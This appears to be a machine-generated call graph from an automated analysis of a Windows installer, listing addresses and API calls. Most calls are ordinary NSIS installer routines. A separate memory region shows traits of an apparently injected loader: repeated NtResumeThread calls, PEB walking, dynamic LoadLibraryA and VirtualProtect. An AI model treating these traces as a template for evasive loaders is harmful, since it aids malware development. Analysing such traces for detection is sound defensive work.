12003->12004 12005 401423 24 API calls 12004->12005 12006 401f3a 12005->12006 12013 405c8e ShellExecuteExW 12006->12013 12008 401f82 12010 40292e 12008->12010 12014 406ae0 WaitForSingleObject 12008->12014 12011 401f9f CloseHandle 12011->12010 12013->12008 12015 406afa 12014->12015 12016 406b0c GetExitCodeProcess 12015->12016 12017 406a71 2 API calls 12015->12017 12016->12011 12018 406b01 WaitForSingleObject 12017->12018 12018->12015 11433 339276a 11434 339276c 11433->11434 11435 339db0f 2 API calls 11434->11435 11436 339277b 11435->11436 12019 401d17 12020 402d84 17 API calls 12019->12020 12021 401d1d IsWindow 12020->12021 12022 401a20 12021->12022 11441 40261c 11442 402da6 17 API calls 11441->11442 11443 402623 11442->11443 11446 406158 GetFileAttributesW CreateFileW 11443->11446 11445 40262f 11446->11445 11121 40252a 11122 402de6 17 API calls 11121->11122 11123 402534 11122->11123 11124 402da6 17 API calls 11123->11124 11125 40253d 11124->11125 11126 402548 RegQueryValueExW 11125->11126 11130 40292e 11125->11130 11127 40256e RegCloseKey 11126->11127 11128 402568 11126->11128 11127->11130 11128->11127 11132 4065af wsprintfW 11128->11132 11132->11127 11447 40202a 11448 402da6 17 API calls 11447->11448 11449 402031 11448->11449 11450 406a35 5 API calls 11449->11450 11451 402040 11450->11451 11452 40205c GlobalAlloc 11451->11452 11461 4020cc 11451->11461 11453 402070 11452->11453 11452->11461 11454 406a35 5 API calls 11453->11454 11455 402077 11454->11455 11456 406a35 5 API calls 11455->11456 11457 402081 11456->11457 11457->11461 11462 4065af wsprintfW 11457->11462 11459 4020ba 11463 4065af wsprintfW 11459->11463 11462->11459 11463->11461 11464 401a30 11465 402da6 17 API calls 11464->11465 11466 401a39 ExpandEnvironmentStringsW 11465->11466 11467 401a4d 11466->11467 11469 401a60 11466->11469 11468 401a52 lstrcmpW 11467->11468 11467->11469 11468->11469 11470 405031 GetDlgItem GetDlgItem 11471 405083 7 API calls 11470->11471 11476 4052a8 11470->11476 11472 40512a DeleteObject 11471->11472 11473 40511d SendMessageW 11471->11473 11474 405133 11472->11474 11473->11472 11475 40516a 11474->11475 11477 4066a5 17 API calls 11474->11477 11478 4045c4 18 API calls 11475->11478 11483 40538a 11476->11483 11503 405317 11476->11503 11524 404f7f SendMessageW 11476->11524 11481 40514c SendMessageW SendMessageW 11477->11481 11482 40517e 11478->11482 11479 405436 11480 405440 SendMessageW 11479->11480 11486 405448 11479->11486 11480->11486 11481->11474 11488 4045c4 18 API calls 11482->11488 11483->11479 11489 4053e3 SendMessageW 11483->11489 11513 40529b 11483->11513 11484 40537c SendMessageW 11484->11483 11485 40462b 8 API calls 11490 405637 11485->11490 11491 405461 11486->11491 11492 40545a ImageList_Destroy 11486->11492 11499 405471 11486->11499 11504 40518f 11488->11504 11494 4053f8 SendMessageW 11489->11494 11489->11513 11495 40546a GlobalFree 11491->11495 11491->11499 11492->11491 11493 4055eb 11500 4055fd ShowWindow GetDlgItem ShowWindow 11493->11500 11493->11513 11497 40540b 11494->11497 11495->11499 11496 40526a GetWindowLongW SetWindowLongW 11498 405283 11496->11498 11509 40541c SendMessageW 11497->11509 11501 4052a0 11498->11501 11502 405288 ShowWindow 11498->11502 11499->11493 11517 4054ac 11499->11517 11529 404fff 11499->11529 11500->11513 11523 4045f9 SendMessageW 11501->11523 11522 4045f9 SendMessageW 11502->11522 11503->11483 11503->11484 11504->11496 11505 405265 11504->11505 11508 4051e2 SendMessageW 11504->11508 11510 405220 SendMessageW 11504->11510 11511 405234 SendMessageW 11504->11511 11505->11496 11505->11498 11508->11504 11509->11479 11510->11504 11511->11504 11513->11485 11514 4055b6 11515 4055c1 InvalidateRect 11514->11515 11518 4055cd 11514->11518 11515->11518 11516 4054da SendMessageW 11520 4054f0 11516->11520 11517->11516 11517->11520 11518->11493 11538 404f3a 11518->11538 11519 405564 SendMessageW SendMessageW 11519->11520 11520->11514 11520->11519 11522->11513 11523->11476 11525 404fa2 GetMessagePos ScreenToClient SendMessageW 11524->11525 11526 404fde SendMessageW 11524->11526 11527 404fd6 11525->11527 11528 404fdb 11525->11528 11526->11527 11527->11503 11528->11526 11541 406668 lstrcpynW 11529->11541 11531 405012 11542 4065af wsprintfW 11531->11542 11533 40501c 11534 40140b 2 API calls 11533->11534 11535 405025 11534->11535 11543 406668 lstrcpynW 11535->11543 11537 40502c 11537->11517 11544 404e71 11538->11544 11540 404f4f 11540->11493 11541->11531 11542->11533 11543->11537 11545 404e8a 11544->11545 11546 4066a5 17 API calls 11545->11546 11547 404eee 11546->11547 11548 4066a5 17 API calls 11547->11548 11549 404ef9 11548->11549 11550 4066a5 17 API calls 11549->11550 11551 404f0f lstrlenW wsprintfW SetDlgItemTextW 11550->11551 11551->11540 11552 339694a 11553 3396a9a 11552->11553 11554 339697f 11552->11554 11555 33a00da NtResumeThread 11554->11555 11555->11553 11224 402434 11225 402467 11224->11225 11226 40243c 11224->11226 11227 402da6 17 API calls 11225->11227 11228 402de6 17 API calls 11226->11228 11229 40246e 11227->11229 11230 402443 11228->11230 11236 402e64 11229->11236 11232 40244d 11230->11232 11233 40247b 11230->11233 11234 402da6 17 API calls 11232->11234 11235 402454 RegDeleteValueW RegCloseKey 11234->11235 11235->11233 11237 402e71 11236->11237 11238 402e78 11236->11238 11237->11233 11238->11237 11240 402ea9 11238->11240 11241 4064d5 RegOpenKeyExW 11240->11241 11242 402ed7 11241->11242 11243 402f81 11242->11243 11244 402ee7 RegEnumValueW 11242->11244 11248 402f0a 11242->11248 11243->11237 11245 402f71 RegCloseKey 11244->11245 11244->11248 11245->11243 11246 402f46 RegEnumKeyW 11247 402f4f RegCloseKey 11246->11247 11246->11248 11249 406a35 5 API calls 11247->11249 11248->11245 11248->11246 11248->11247 11250 402ea9 6 API calls 11248->11250 11251 402f5f 11249->11251 11250->11248 11251->11243 11252 402f63 RegDeleteKeyW 11251->11252 11252->11243 12030 404734 lstrlenW 12031 404753 12030->12031 12032 404755 WideCharToMultiByte 12030->12032 12031->12032 12033 401735 12034 402da6 17 API calls 12033->12034 12035 40173c SearchPathW 12034->12035 12036 401757 12035->12036 12037 401d38 12038 402d84 17 API calls 12037->12038 12039 401d3f 12038->12039 12040 402d84 17 API calls 12039->12040 12041 401d4b GetDlgItem 12040->12041 12042 402638 12041->12042 11556 40563e 11557 405662 11556->11557 11558 40564e 11556->11558 11561 40566a IsWindowVisible 11557->11561 11567 405681 11557->11567 11559 405654 11558->11559 11560 4056ab 11558->11560 11563 404610 SendMessageW 11559->11563 11562 4056b0 CallWindowProcW 11560->11562 11561->11560 11564 405677 11561->11564 11565 40565e 11562->11565 11563->11565 11566 404f7f 5 API calls 11564->11566 11566->11567 11567->11562 11568 404fff 4 API calls 11567->11568 11568->11560 11569 40263e 11570 402652 11569->11570 11571 40266d 11569->11571 11572 402d84 17 API calls 11570->11572 11573 402672 11571->11573 11574 40269d 11571->11574 11581 402659 11572->11581 11576 402da6 17 API calls 11573->11576 11575 402da6 17 API calls 11574->11575 11577 4026a4 lstrlenW 11575->11577 11578 402679 11576->11578 11577->11581 11586 40668a WideCharToMultiByte 11578->11586 11580 40268d lstrlenA 11580->11581 11582 4026e7 11581->11582 11583 4026d1 11581->11583 11587 406239 SetFilePointer 11581->11587 11583->11582 11584 40620a WriteFile 11583->11584 11584->11582 11586->11580 11588 406255 11587->11588 11591 40626d 11587->11591 11589 4061db ReadFile 11588->11589 11590 406261 11589->11590 11590->11591 11592 406276 SetFilePointer 11590->11592 11593 40629e SetFilePointer 11590->11593 11591->11583 11592->11593 11594 406281 11592->11594 11593->11591 11595 40620a WriteFile 11594->11595 11595->11591 12043 3395646 12044 33a00da NtResumeThread 12043->12044 12045 339569a 12044->12045 12046 33a00da NtResumeThread 12045->12046 12047 33956cd 12046->12047 12048 33a00da NtResumeThread 12047->12048 12049 33957a2 12048->12049 12050 33a00da NtResumeThread 12049->12050 12051 33957bb 12050->12051 10575 4015c1 10576 402da6 17 API calls 10575->10576 10577 4015c8 10576->10577 10578 405fe2 4 API calls 10577->10578 10591 4015d1 10578->10591 10579 401631 10581 401663 10579->10581 10582 401636 10579->10582 10580 405f64 CharNextW 10580->10591 10585 401423 24 API calls 10581->10585 10594 401423 10582->10594 10590 40165b 10585->10590 10587 405c16 2 API calls 10587->10591 10588 405c33 5 API calls 10588->10591 10589 40164a SetCurrentDirectoryW 10589->10590 10591->10579 10591->10580 10591->10587 10591->10588 10592 401617 GetFileAttributesW 10591->10592 10593 405b99 4 API calls 10591->10593 10592->10591 10593->10591 10595 4056ca 24 API calls 10594->10595 10596 401431 10595->10596 10597 406668 lstrcpynW 10596->10597 10597->10589 12052 33968bb 12055 33968bc 12052->12055 12053 3396ab3 12054 3396952 12057 33a00da NtResumeThread 12054->12057 12058 3396a9a 12054->12058 12055->12053 12055->12054 12056 33a00da NtResumeThread 12055->12056 12056->12054 12057->12058 11596 4028c4 11597 4028ca 11596->11597 11598 4028d2 FindClose 11597->11598 11599 402c2a 11597->11599 11598->11599 10598 4040c5 10599 4040dd 10598->10599 10600 40423e 10598->10600 10599->10600 10601 4040e9 10599->10601 10602 40424f GetDlgItem GetDlgItem 10600->10602 10607 40428f 10600->10607 10603 4040f4 SetWindowPos 10601->10603 10604 404107 10601->10604 10605 4045c4 18 API calls 10602->10605 10603->10604 10609 404110 ShowWindow 10604->10609 10610 404152 10604->10610 10611 404279 SetClassLongW 10605->10611 10606 4042e9 10608 404610 SendMessageW 10606->10608 10613 404239 10606->10613 10607->10606 10612 401389 2 API calls 10607->10612 10641 4042fb 10608->10641 10614 404130 GetWindowLongW 10609->10614 10615 40422b 10609->10615 10616 404171 10610->10616 10617 40415a DestroyWindow 10610->10617 10618 40140b 2 API calls 10611->10618 10619 4042c1 10612->10619 10614->10615 10621 404149 ShowWindow 10614->10621 10680 40462b 10615->10680 10623 404176 SetWindowLongW 10616->10623 10624 404187 10616->10624 10622 40454d 10617->10622 10618->10607 10619->10606 10625 4042c5 SendMessageW 10619->10625 10621->10610 10622->10613 10631 40457e ShowWindow 10622->10631 10623->10613 10624->10615 10628 404193 GetDlgItem 10624->10628 10625->10613 10626 40140b 2 API calls 10626->10641 10627 40454f DestroyWindow EndDialog 10627->10622 10629 4041c1 10628->10629 10630 4041a4 SendMessageW IsWindowEnabled 10628->10630 10633 4041ce 10629->10633 10634 404215 SendMessageW 10629->10634 10635 4041e1 10629->10635 10645 4041c6 10629->10645 10630->10613 10630->10629 10631->10613 10632 4066a5 17 API calls 10632->10641 10633->10634 10633->10645 10634->10615 10638 4041e9 10635->10638 10639 4041fe 10635->10639 10637 4045c4 18 API calls 10637->10641 10643 40140b 2 API calls 10638->10643 10642 40140b 2 API calls 10639->10642 10640 4041fc 10640->10615 10641->10613 10641->10626 10641->10627 10641->10632 10641->10637 10662 40448f DestroyWindow 10641->10662 10671 4045c4 10641->10671 10644 404205 10642->10644 10643->10645 10644->10615 10644->10645 10677 40459d 10645->10677 10647 404376 GetDlgItem 10648 404393 ShowWindow KiUserCallbackDispatcher 10647->10648 10649 40438b 10647->10649 10674 4045e6 KiUserCallbackDispatcher 10648->10674 10649->10648 10651 4043bd EnableWindow 10656 4043d1 10651->10656 10652 4043d6 GetSystemMenu EnableMenuItem SendMessageW 10653 404406 SendMessageW 10652->10653 10652->10656 10653->10656 10655 4040a6 18 API calls 10655->10656 10656->10652 10656->10655 10675 4045f9 SendMessageW 10656->10675 10676 406668 lstrcpynW 10656->10676 10658 404435 lstrlenW 10659 4066a5 17 API calls 10658->10659 10660 40444b SetWindowTextW 10659->10660 10661 401389 2 API calls 10660->10661 10661->10641 10662->10622 10663 4044a9 CreateDialogParamW 10662->10663 10663->10622 10664 4044dc 10663->10664 10665 4045c4 18 API calls 10664->10665 10666 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 10665->10666 10667 401389 2 API calls 10666->10667 10668 40452d 10667->10668 10668->10613 10669 404535 ShowWindow 10668->10669 10670 404610 SendMessageW 10669->10670 10670->10622 10672 4066a5 17 API calls 10671->10672 10673 4045cf SetDlgItemTextW 10672->10673 10673->10647 10674->10651 10675->10656 10676->10658 10678 4045a4 10677->10678 10679 4045aa SendMessageW 10677->10679 10678->10679 10679->10640 10681 4046ee 10680->10681 10682 404643 GetWindowLongW 10680->10682 10681->10613 10682->10681 10683 404658 10682->10683 10683->10681 10684 404685 GetSysColor 10683->10684 10685 404688 10683->10685 10684->10685 10686 404698 SetBkMode 10685->10686 10687 40468e SetTextColor 10685->10687 10688 4046b0 GetSysColor 10686->10688 10689 4046b6 10686->10689 10687->10686 10688->10689 10690 4046c7 10689->10690 10691 4046bd SetBkColor 10689->10691 10690->10681 10692 4046e1 CreateBrushIndirect 10690->10692 10693 4046da DeleteObject 10690->10693 10691->10690 10692->10681 10693->10692 11600 3394fb0 11601 3394fe6 11600->11601 11604 3398515 GetPEB 11601->11604 11603 3395012 11605 339853d 11604->11605 11605->11603 10772 4014cb 10773 4056ca 24 API calls 10772->10773 10774 4014d2 10773->10774 12059 339dab2 12060 339daf8 GetPEB 12059->12060 11606 4016cc 11607 402da6 17 API calls 11606->11607 11608 4016d2 GetFullPathNameW 11607->11608 11609 4016ec 11608->11609 11615 40170e 11608->11615 11612 40699e 2 API calls 11609->11612 11609->11615 11610 401723 GetShortPathNameW 11611 402c2a 11610->11611 11613 4016fe 11612->11613 11613->11615 11616 406668 lstrcpynW 11613->11616 11615->11610 11615->11611 11616->11615 11617 3392fb7 11618 3392ffb EnumWindows 11617->11618 11619 3393082 11618->11619 11620 3393062 11618->11620 11620->11619 11621 339db0f 2 API calls 11620->11621 11622 33931aa 11621->11622 12061 3393aaa 12062 3393ab0 12061->12062 12063 3393b0e 12062->12063 12064 339bb26 3 API calls 12062->12064 12065 3393d0d 12064->12065 11623 403cd5 11624 403ce0 11623->11624 11625 403ce4 11624->11625 11626 403ce7 GlobalAlloc 11624->11626 11626->11625 12066 70e21774 12067 70e217a3 12066->12067 12068 70e21bff 22 API calls 12067->12068 12069 70e217aa 12068->12069 12070 70e217b1 12069->12070 12071 70e217bd 12069->12071 12074 70e21312 2 API calls 12070->12074 12072 70e217c7 12071->12072 12073 70e217e4 12071->12073 12075 70e215dd 3 API calls 12072->12075 12076 70e217ea 12073->12076 12077 70e2180e 12073->12077 12078 70e217bb 12074->12078 12080 70e217cc 12075->12080 12081 70e21654 3 API calls 12076->12081 12079 70e215dd 3 API calls 12077->12079 12079->12078 12082 70e21654 3 API calls 12080->12082 12083 70e217ef 12081->12083 12084 70e217d2 12082->12084 12085 70e21312 2 API calls 12083->12085 12086 70e21312 2 API calls 12084->12086 12087 70e217f5 GlobalFree 12085->12087 12088 70e217d8 GlobalFree 12086->12088 12087->12078 12089 70e21809 GlobalFree 12087->12089 12088->12078 12089->12078 10880 4014d7 10881 402d84 17 API calls 10880->10881 10882 4014dd Sleep 10881->10882 10884 402c2a 10882->10884 10885 4020d8 10886 40219c 10885->10886 10887 4020ea 10885->10887 10889 401423 24 API calls 10886->10889 10888 402da6 17 API calls 10887->10888 10890 4020f1 10888->10890 10896 4022f6 10889->10896 10891 402da6 17 API calls 10890->10891 10892 4020fa 10891->10892 10893 402110 LoadLibraryExW 10892->10893 10894 402102 GetModuleHandleW 10892->10894 10893->10886 10895 402121 10893->10895 10894->10893 10894->10895 10908 406aa4 10895->10908 10899 402132 10901 402151 10899->10901 10902 40213a 10899->10902 10900 40216b 10903 4056ca 24 API calls 10900->10903 10913 70e21817 10901->10913 10904 401423 24 API calls 10902->10904 10905 402142 10903->10905 10904->10905 10905->10896 10906 40218e FreeLibrary 10905->10906 10906->10896 10955 40668a WideCharToMultiByte 10908->10955 10910 406ac1 10911 406ac8 GetProcAddress 10910->10911 10912 40212c 10910->10912 10911->10912 10912->10899 10912->10900 10914 70e2184a 10913->10914 10956 70e21bff 10914->10956 10916 70e21851 10917 70e21976 10916->10917 10918 70e21862 10916->10918 10919 70e21869 10916->10919 10917->10905 11002 70e2243e 10918->11002 10988 70e22480 10919->10988 10924 70e218af 11015 70e22655 10924->11015 10925 70e218cd 10929 70e218d3 10925->10929 10930 70e2191e 10925->10930 10926 70e21898 10938 70e2188e 10926->10938 11012 70e22e23 10926->11012 10927 70e2187f 10934 70e21890 10927->10934 10935 70e21885 10927->10935 11034 70e21666 10929->11034 10932 70e22655 10 API calls 10930->10932 10939 70e2190f 10932->10939 10933 70e218b5 11026 70e21654 10933->11026 11006 70e22810 10934->11006 10935->10938 10998 70e22b98 10935->10998 10938->10924 10938->10925 10946 70e21965 10939->10946 11040 70e22618 10939->11040 10944 70e21896 10944->10938 10945 70e22655 10 API calls 10945->10939 10946->10917 10948 70e2196f GlobalFree 10946->10948 10948->10917 10952 70e21951 10952->10946 11044 70e215dd wsprintfW 10952->11044 10953 70e2194a FreeLibrary 10953->10952 10955->10910 11047 70e212bb GlobalAlloc 10956->11047 10958 70e21c26 11048 70e212bb GlobalAlloc 10958->11048 10960 70e21e6b GlobalFree GlobalFree GlobalFree 10961 70e21e88 10960->10961 10977 70e21ed2 10960->10977 10963 70e2227e 10961->10963 10971 70e21e9d 10961->10971 10961->10977 10962 70e21d26 GlobalAlloc 10980 70e21c31 10962->10980 10964 70e222a0 GetModuleHandleW 10963->10964 10963->10977 10967 70e222b1 LoadLibraryW 10964->10967 10968 70e222c6 10964->10968 10965 70e21d71 lstrcpyW 10970 70e21d7b lstrcpyW 10965->10970 10966 70e21d8f GlobalFree 10966->10980 10967->10968 10967->10977 11055 70e216bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 10968->11055 10970->10980 10971->10977 11051 70e212cc 10971->11051 10972 70e22318 10976 70e22325 lstrlenW 10972->10976 10972->10977 10973 70e22126 11054 70e212bb GlobalAlloc 10973->11054 11056 70e216bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 10976->11056 10977->10916 10978 70e222d8 10978->10972 10986 70e22302 GetProcAddress 10978->10986 10980->10960 10980->10962 10980->10965 10980->10966 10980->10970 10980->10973 10980->10977 10981 70e22067 GlobalFree 10980->10981 10982 70e221ae 10980->10982 10983 70e212cc 2 API calls 10980->10983 11049 70e2162f GlobalSize GlobalAlloc 10980->11049 10981->10980 10982->10977 10984 70e22216 lstrcpyW 10982->10984 10983->10980 10984->10977 10986->10972 10987 70e2212f 10987->10916 10995 70e22498 10988->10995 10989 70e212cc GlobalAlloc lstrcpynW 10989->10995 10991 70e225c1 GlobalFree 10992 70e2186f 10991->10992 10991->10995 10992->10926 10992->10927 10992->10938 10993 70e22540 GlobalAlloc WideCharToMultiByte 10993->10991 10994 70e2256b GlobalAlloc CLSIDFromString 10994->10991 10995->10989 10995->10991 10995->10993 10995->10994 10997 70e2258a 10995->10997 11058 70e2135a 10995->11058 10997->10991 11062 70e227a4 10997->11062 11001 70e22baa 10998->11001 11000 70e22d39 11000->10938 11065 70e22b42 11001->11065 11003 70e22453 11002->11003 11004 70e2245e GlobalAlloc 11003->11004 11005 70e21868 11003->11005 11004->11003 11005->10919 11010 70e22840 11006->11010 11007 70e228db GlobalAlloc 11011 70e228fe 11007->11011 11008 70e228ee 11009 70e228f4 GlobalSize 11008->11009 11008->11011 11009->11011 11010->11007 11010->11008 11011->10944 11013 70e22e2e 11012->11013 11014 70e22e6e GlobalFree 11013->11014 11069 70e212bb GlobalAlloc 11015->11069 11017 70e226fa StringFromGUID2 11023 70e2265f 11017->11023 11018 70e2270b lstrcpynW 11018->11023 11019 70e226d8 MultiByteToWideChar 11019->11023 11020 70e2271e wsprintfW 11020->11023 11021 70e22742 GlobalFree 11021->11023 11022 70e22777 GlobalFree 11022->10933 11023->11017 11023->11018 11023->11019 11023->11020 11023->11021 11023->11022 11024 70e21312 2 API calls 11023->11024 11070 70e21381 11023->11070 11024->11023 11074 70e212bb GlobalAlloc 11026->11074 11028 70e21659 11029 70e21666 2 API calls 11028->11029 11030 70e21663 11029->11030 11031 70e21312 11030->11031 11032 70e21355 GlobalFree 11031->11032 11033 70e2131b GlobalAlloc lstrcpynW 11031->11033 11032->10939 11033->11032 11035 70e21672 wsprintfW 11034->11035 11036 70e2169f lstrcpyW 11034->11036 11039 70e216b8 11035->11039 11036->11039 11039->10945 11041 70e22626 11040->11041 11042 70e21931 11040->11042 11041->11042 11043 70e22642 GlobalFree 11041->11043 11042->10952 11042->10953 11043->11041 11045 70e21312 2 API calls 11044->11045 11046 70e215fe 11045->11046 11046->10946 11047->10958 11048->10980 11050 70e2164d 11049->11050 11050->10980 11057 70e212bb GlobalAlloc 11051->11057 11053 70e212db lstrcpynW 11053->10977 11054->10987 11055->10978 11056->10977 11057->11053 11059 70e21361 11058->11059 11060 70e212cc 2 API calls 11059->11060 11061 70e2137f 11060->11061 11061->10995 11063 70e227b2 VirtualAlloc 11062->11063 11064 70e22808 11062->11064 11063->11064 11064->10997 11066 70e22b4d 11065->11066 11067 70e22b52 GetLastError 11066->11067 11068 70e22b5d 11066->11068 11067->11068 11068->11000 11069->11023 11071 70e2138a 11070->11071 11072 70e213ac 11070->11072 11071->11072 11073 70e21390 lstrcpyW 11071->11073 11072->11023 11073->11072 11074->11028 12090 33966a3 12091 33966a4 12090->12091 12092 33a00da NtResumeThread 12091->12092 12094 3396764 12092->12094 12093 3396ab3 12094->12093 12096 33a00da NtResumeThread 12094->12096 12097 3396952 12094->12097 12095 3396a9a 12096->12097 12097->12095 12098 33a00da NtResumeThread 12097->12098 12098->12095 12099 3398ca3 12100 3398c58 12099->12100 12101 3398cda 12100->12101 12102 339db0f 12100->12102 12103 3398e66 12101->12103 12104 3398dcd GetPEB 12101->12104 12106 339e0d5 GetPEB 12102->12106 12107 339dba8 12102->12107 12104->12103 12105 339dbdc LoadLibraryA 12108 339dbe6 12105->12108 12106->12107 12107->12105 12109 70e21979 12110 70e2199c 12109->12110 12111 70e219d1 GlobalFree 12110->12111 12112 70e219e3 12110->12112 12111->12112 12113 70e21312 2 API calls 12112->12113 12114 70e21b6e GlobalFree GlobalFree 12113->12114 11081 70e22a7f 11082 70e22acf 11081->11082 11083 70e22a8f VirtualProtect 11081->11083 11083->11082 11099 401ede 11100 402d84 17 API calls 11099->11100 11101 401ee4 11100->11101 11102 402d84 17 API calls 11101->11102 11103 401ef0 11102->11103 11104 401f07 EnableWindow 11103->11104 11105 401efc ShowWindow 11103->11105 11106 402c2a 11104->11106 11105->11106 11627 4028de 11628 4028e6 11627->11628 11629 4028ea FindNextFileW 11628->11629 11632 4028fc 11628->11632 11630 402943 11629->11630 11629->11632 11633 406668 lstrcpynW 11630->11633 11633->11632 12115 339e899 12116 339db0f 2 API calls 12115->12116 12117 339e8ae 12116->12117 12118 33a00da NtResumeThread 12117->12118 12119 339ee40 12117->12119 12118->12117 12120 70e22d43 12121 70e22d5b 12120->12121 12122 70e2162f 2 API calls 12121->12122 12123 70e22d76 12122->12123 11634 339559a 11635 3395647 11634->11635 11636 339569a 11635->11636 11637 33a00da NtResumeThread 11635->11637 11638 33a00da NtResumeThread 11636->11638 11637->11636 11639 33956cd 11638->11639 11640 33a00da NtResumeThread 11639->11640 11641 33957a2 11640->11641 11642 33a00da NtResumeThread 11641->11642 11643 33957bb 11642->11643 11644 402aeb 11645 402d84 17 API calls 11644->11645 11646 402af1 11645->11646 11647 4066a5 17 API calls 11646->11647 11648 40292e 11646->11648 11647->11648 11649 3398b95 11651 3398bbf 11649->11651 11650 3398dcd GetPEB 11654 3398e66 11650->11654 11651->11650 11652 3398c49 GetPEB 11651->11652 11653 3398c58 11652->11653 11653->11653 11655 3398cda 11653->11655 11656 339db0f 11653->11656 11655->11650 11655->11654 11658 339e0d5 GetPEB 11656->11658 11660 339dba8 11656->11660 11657 339dbdc LoadLibraryA 11659 339dbe6 11657->11659 11658->11660 11660->11657 11661 4026ec 11662 402d84 17 API calls 11661->11662 11670 4026fb 11662->11670 11663 402838 11664 402745 ReadFile 11664->11663 11664->11670 11665 4061db ReadFile 11665->11670 11666 402785 MultiByteToWideChar 11666->11670 11667 40283a 11674 4065af wsprintfW 11667->11674 11668 406239 5 API calls 11668->11670 11670->11663 11670->11664 11670->11665 11670->11666 11670->11667 11670->11668 11671 4027ab SetFilePointer MultiByteToWideChar 11670->11671 11672 40284b 11670->11672 11671->11670 11672->11663 11673 40286c SetFilePointer 11672->11673 11673->11663 11674->11663 11675 3396588 11676 339659a 11675->11676 11679 3396616 11676->11679 11678 3396613 11680 33966a4 11679->11680 11681 33a00da NtResumeThread 11680->11681 11683 3396764 11681->11683 11682 3396ab3 11682->11678 11683->11682 11684 33a00da NtResumeThread 11683->11684 11685 3396952 11683->11685 11684->11685 11686 33a00da NtResumeThread 11685->11686 11687 3396a9a 11685->11687 11686->11687 11687->11678 11184 3393c8a 11185 3393cb3 11184->11185 11186 3393ab6 11184->11186 11188 3393b0e 11186->11188 11190 339bb26 11186->11190 11189 3393d0d 11191 339db0f 2 API calls 11190->11191 11192 339bb33 11191->11192 11193 339db0f 2 API calls 11192->11193 11194 339bb43 11193->11194 11195 339db0f 2 API calls 11194->11195 11196 339bb53 11195->11196 11197 339db0f 2 API calls 11196->11197 11198 339bb63 11197->11198 11199 339db0f 2 API calls 11198->11199 11200 339bbfc 11199->11200 11204 339bc07 11200->11204 11202 339c36f 11203 339c3b6 LdrInitializeThunk 11202->11203 11203->11189 11205 339bc49 11204->11205 11206 339db0f 2 API calls 11205->11206 11207 339bc9c 11206->11207 11208 339db0f 2 API calls 11207->11208 11210 339bcb1 11208->11210 11209 339db0f LoadLibraryA GetPEB 11209->11210 11210->11209 11211 339bd76 11210->11211 11212 339db0f 2 API calls 11211->11212 11215 339be07 11211->11215 11214 339bde7 11212->11214 11213 339be8d 11218 339db0f 2 API calls 11213->11218 11216 339db0f 2 API calls 11214->11216 11215->11213 11217 339be7e 11215->11217 11221 339db0f 2 API calls 11215->11221 11219 339bdfa 11216->11219 11220 339db0f 2 API calls 11217->11220 11223 339bed8 11218->11223 11222 339db0f 2 API calls 11219->11222 11220->11213 11221->11215 11222->11215 11253 4023f4 11254 402da6 17 API calls 11253->11254 11255 402403 11254->11255 11256 402da6 17 API calls 11255->11256 11257 40240c 11256->11257 11258 402da6 17 API calls 11257->11258 11259 402416 GetPrivateProfileStringW 11258->11259 11688 4014f5 SetForegroundWindow 11689 402c2a 11688->11689 11690 3393d8f 11691 339db0f 2 API calls 11690->11691 11692 3393d99 11691->11692 12128 401ff6 12129 402da6 17 API calls 12128->12129 12130 401ffd 12129->12130 12131 40699e 2 API calls 12130->12131 12132 402003 12131->12132 12134 402014 12132->12134 12135 4065af wsprintfW 12132->12135 12135->12134 11693 3395783 11694 3395784 11693->11694 11695 33a00da NtResumeThread 11694->11695 11696 33957a2 11695->11696 11697 33a00da NtResumeThread 11696->11697 11698 33957bb 11697->11698 11699 70e21058 11701 70e21074 11699->11701 11700 70e210dd 11701->11700 11702 70e21092 11701->11702 11712 70e215b6 11701->11712 11704 70e215b6 GlobalFree 11702->11704 11705 70e210a2 11704->11705 11706 70e210b2 11705->11706 11707 70e210a9 GlobalSize 11705->11707 11708 70e210b6 GlobalAlloc 11706->11708 11709 70e210c7 11706->11709 11707->11706 11710 70e215dd 3 API calls 11708->11710 11711 70e210d2 GlobalFree 11709->11711 11710->11709 11711->11700 11714 70e215bc 11712->11714 11713 70e215c2 11713->11702 11714->11713 11715 70e215ce GlobalFree 11714->11715 11715->11702 11716 4046fa lstrcpynW lstrlenW 12136 406ffe 12137 406be3 12136->12137 12138 40754e 12137->12138 12139 406c64 GlobalFree 12137->12139 12140 406c6d GlobalAlloc 12137->12140 12141 406ce4 GlobalAlloc 12137->12141 12142 406cdb GlobalFree 12137->12142 12139->12140 12140->12137 12140->12138 12141->12137 12141->12138 12142->12141 11260 4022ff 11261 402da6 17 API calls 11260->11261 11262 402305 11261->11262 11263 402da6 17 API calls 11262->11263 11264 40230e 11263->11264 11265 402da6 17 API calls 11264->11265 11266 402317 11265->11266 11267 40699e 2 API calls 11266->11267 11268 402320 11267->11268 11269 402331 lstrlenW lstrlenW 11268->11269 11270 402324 11268->11270 11272 4056ca 24 API calls 11269->11272 11271 4056ca 24 API calls 11270->11271 11274 40232c 11270->11274 11271->11274 11273 40236f SHFileOperationW 11272->11273 11273->11270 11273->11274 12143 4019ff 12144 402da6 17 API calls 12143->12144 12145 401a06 12144->12145 12146 402da6 17 API calls 12145->12146 12147 401a0f 12146->12147 12148 401a16 lstrcmpiW 12147->12148 12149 401a28 lstrcmpW 12147->12149 12150 401a1c 12148->12150 12149->12150 12151 401d81 12152 401d94 GetDlgItem 12151->12152 12153 401d87 12151->12153 12156 401d8e 12152->12156 12154 402d84 17 API calls 12153->12154 12154->12156 12155 401dd5 GetClientRect LoadImageW SendMessageW 12159 401e33 12155->12159 12161 401e3f 12155->12161 12156->12155 12157 402da6 17 API calls 12156->12157 12157->12155 12160 401e38 DeleteObject 12159->12160 12159->12161 12160->12161 12162 404783 12163 40479b 12162->12163 12167 4048b5 12162->12167 12168 4045c4 18 API calls 12163->12168 12164 40491f 12165 4049e9 12164->12165 12166 404929 GetDlgItem 12164->12166 12173 40462b 8 API calls 12165->12173 12169 404943 12166->12169 12170 4049aa 12166->12170 12167->12164 12167->12165 12171 4048f0 GetDlgItem SendMessageW 12167->12171 12172 404802 12168->12172 12169->12170 12174 404969 SendMessageW LoadCursorW SetCursor 12169->12174 12170->12165 12175 4049bc 12170->12175 12195 4045e6 KiUserCallbackDispatcher 12171->12195 12177 4045c4 18 API calls 12172->12177 12184 4049e4 12173->12184 12196 404a32 12174->12196 12179 4049d2 12175->12179 12180 4049c2 SendMessageW 12175->12180 12182 40480f CheckDlgButton 12177->12182 12179->12184 12185 4049d8 SendMessageW 